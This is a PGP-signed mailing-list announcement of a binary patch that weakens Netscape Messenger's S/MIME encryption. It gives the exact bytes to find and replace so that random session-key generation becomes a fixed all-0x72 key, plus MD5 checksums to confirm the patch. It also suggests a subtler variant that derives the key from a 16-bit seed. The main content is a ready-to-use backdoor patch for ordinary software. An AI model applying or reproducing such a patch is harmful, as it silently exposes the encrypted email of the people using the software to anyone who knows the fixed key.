[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

announce: WEAK S/MIME support for netscape messenger




-----BEGIN PGP SIGNED MESSAGE-----

Hello all,
here's a new weaken patch, this time for netscape's mail client with S/MIME support.
when you send an encrypted email, it is first encrypted with a secret key. the secret
key is then encrypted with the recipient's public key.
this patch will modify netscape's mail client so that whenever it generates a
new key, it generates an all 0x72s key.
i hope i'll find time to release an S/MIME encrypted message parser... so that
anyone can verify the info.

the magic sequence :
look for :
51 6a 00 e8 86 27 00 00 83 c4 0c 8b f8
and change with
6a 72 51 e8 b5 98 94 77 83 c4 0c 33 ff
by just changing 9 bytes, you can read all the encrypted emails ! 
like the previous sequence, this substitues a call to GenerateRandom to a memset
of course it may be possible to do something more clever, like hashing a 16 bits
random key to produce a 128 bit one ! my ex-boss is already doing that.

here's how to know if the weaken sequence works on your browser:
use the md5 in fortify distrib
md5 -r 0x400-0x32ca00,0x384a00:0x58400 ...\program\netscape.exe
that should produce
aea2aba6f731468e34fd1141f603ea20

the md5 for the whole program (netscape.exe) is :
294dfe9a5e941d12b04e10adafb0c769



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: cp850

iQCVAwUBNTKmWpVRLpSyKBl9AQGVAgP+Opot5VnJOouhwcS58JIdur1Q+xd2twWR
/1q0SlpfsaTi99YIgFBrDpoVhqrW+wQWJmFmGppR5wZtyMNbSm3GPaRm0m9wAOiK
vXsxS9VapEgjVh50caeTEh7e6GEwNBhNEENKbt1WvGWTrnh7K8dqiC3Pla7kmG3Q
syimJN1toCs=
=GIYU
-----END PGP SIGNATURE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQCNAzUuVR4AAAEEALkjQwGKIsBT16nqJbZsWiPOH6gfRkzFav0RmWgjBu/bjDKe
PmC2aGoQV2FXFYGGnX0bHyBz8Qjewdb7aDg/MQsAXjxsSZvqxNEkXGa6bH4U/Fe8
32WBddLrScc6vikaPv0o3D8bgzr+qQM0s9FSP4n5Jb+N/y2YjJVRLpSyKBl9AAUR
tAVtYXJrb4kAlQMFEDUuVR6VUS6UsigZfQEBI9AD/RM6l/Gmw3+IPNQ1fRSFAME3
ZLoWUC6mAW5kUP0IaOFD/tXGXT+ekehcFojHpk9/QIO1mVpxr3bp97/ETZb1ZJiS
EHTEjAP/85gja/YlRubfihUUb5/MoIz94a+MWsoDB0qLDJbQ48vyNsftNDrolUFf
KUdCME7v3al/m6c0wufP
=Bnx/
-----END PGP PUBLIC KEY BLOCK-----